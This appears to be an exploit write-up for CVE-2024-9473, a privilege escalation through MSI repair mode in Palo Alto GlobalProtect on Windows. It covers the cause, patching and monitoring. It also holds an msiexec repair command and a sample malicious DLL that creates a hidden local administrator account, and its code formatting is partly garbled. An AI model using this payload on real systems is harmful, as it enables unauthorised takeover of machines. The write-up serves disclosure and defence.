CVE-2024-9473 - Privilege Escalation via GlobalProtect Repair Functionality on Windows

Summary:
A critical privilege escalation vulnerability, tracked as CVE-2024-9473, has been discovered in Palo Alto Networks’ GlobalProtect app for Windows. This bug allows any authenticated (but non-admin) user to gain SYSTEM-level privileges on a Windows machine by abusing the MSI installer’s “Repair” functionality. This exclusive article will walk you through the technical details, how the exploit works, and how to protect your systems.

What is GlobalProtect?

GlobalProtect is Palo Alto Networks' widely used VPN client, deployed across enterprises for secure remote access. The Windows app is normally installed via an MSI package, which provides install and repair functions.

The Vulnerability

The vulnerability lies in how GlobalProtect registers its MSI installer’s "repair" functionality on Windows. Any local authenticated user—even one without admin rights—can trigger the MSI’s repair functionality. During this repair, the installer may execute commands or scripts as NT AUTHORITY\SYSTEM, opening avenues for privilege escalation.

Root Cause

When installed, many MSI packages—including GlobalProtect—register a product ID in the Windows Installer database. Regular users can call Windows Installer to “repair” an installed application, and some, like GlobalProtect’s MSI, run processes as SYSTEM without properly restricting what can be run or replaced.

A Walkthrough: How the Exploit Works

It’s surprisingly easy for an attacker with limited local access to exploit this bug. Here’s a simplified step-by-step process:

Writes Malicious File:

The attacker prepares a malicious file (e.g., a reverse shell, or code for creating a new admin user), placing it in a location that the MSI’s repair process will interact with—commonly folders with weak permissions.

Finds Product Code:

Every MSI-installed application registers with a unique Product Code. This can be found with tools like PowerShell:

`cmd

msiexec /fa {PRODUCT-CODE-HERE}

`powershell

Start-Process "msiexec.exe" -ArgumentList "/fa {PRODUCT-CODE-HERE}" -Wait

`

The /f switch stands for “repair,” and will execute as SYSTEM.

Privilege Escalation:

If the attacker’s payload is picked up during the repair process (for instance, by exploiting DLL search-order hijacking or replacing files GlobalProtect expects), their malicious code runs as SYSTEM—full admin rights.

Example Exploit (DLL Hijacking)

Suppose GlobalProtect’s MSI repair process loads a DLL from a writeable folder (e.g., %TEMP%). The attacker could drop a malicious DLL:

// malicious.dll - compiles to a DLL using Visual Studio
#include <Windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    if (ul_reason_for_call == DLL_PROCESS_ATTACH)
    {
        system("net user exploituser Password123! /add");
        system("net localgroup administrators exploituser /add");
    }
    return TRUE;
}

After compiling the DLL, the attacker just needs it to be loaded during the repair phase. When that happens, the code adds a new local user “exploituser” to the Administrators group.

Video & References

- Palo Alto Networks Security Advisory (CVE-2024-9473)
- MITRE CVE Record
- MSI Repair Mode Explained

How to Defend

1. Update GlobalProtect:
Palo Alto Networks has released updated versions that address this issue. Patch all endpoints running GlobalProtect.

2. Restrict MSI Repair:
On sensitive systems, Group Policy can block users from invoking repairs or restrict write access to folders MSC repairs touch.

3. Monitor for Suspicious MSIExec Repair Activities:
SIEM alerting on msiexec.exe usage by non-admins can catch in-progress attacks.

4. Remove Excess Write Permissions:
Verify that installation folders, temp directories, or paths used by GlobalProtect don’t allow “Everyone” or “Users” write access.

Conclusion

CVE-2024-9473 is a textbook example of how something as standard as MSI “repair” mode can be misused for privilege escalation if not hardened. As remote work and VPNs remain critical, this vulnerability underlines the importance of uninstalling or updating unsafe software versions—even if the exploit looks like it needs local access. By fixing this flaw quickly, Palo Alto Networks has secured millions of endpoints.

Stay safe. Patch your GlobalProtect clients, and never underestimate “harmless” features like “repair” mode!

Do you have more findings or want to share your story? Comment below or reach out to our team.

*Exclusive writeup by [YourName], all rights reserved. First published on [date].*

Timeline

Published on: 10/09/2024 17:15:21 UTC
Last modified on: 10/18/2024 11:59:17 UTC